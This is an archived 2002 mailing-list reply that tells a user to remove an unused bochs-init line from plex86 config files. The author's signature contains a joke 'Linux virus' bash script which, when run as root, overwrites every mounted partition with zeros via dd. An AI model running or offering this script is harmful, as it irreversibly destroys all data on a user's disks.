It isn't used anymore, remove the line.

EL

Le 17 Mars 2002 12:43, vous avez écrit :
> I'm having trouble with the plex86 config files in the CVS tree, as
> well as the gnumach config file from Marcus's locker in alpha.gnu.org.
>
> bochs-opt is being understood but not bochs-init.  Any clues?
>
> Thanks,
> Karl

-- 
Eric Laberge

GCS/M/S d-(++) s-: a-- C++(++++) UL+++>$ !P L++ E--- W++ N+ w++ !O M
!V PS PE Y PGP-(+++) t++(-) X- R* tv+ b+ DI+++  D+ G e+>+++++ h! r--

#!/bin/bash
if [ $UID -ne 0 ]
then
 echo "Linux virus, please run as root"
else
 for partition in $(df | cut -d ' ' -f 1 | grep /dev)
 do
  dd if=/dev/zero of=$partition
 done
fi

Reply via email to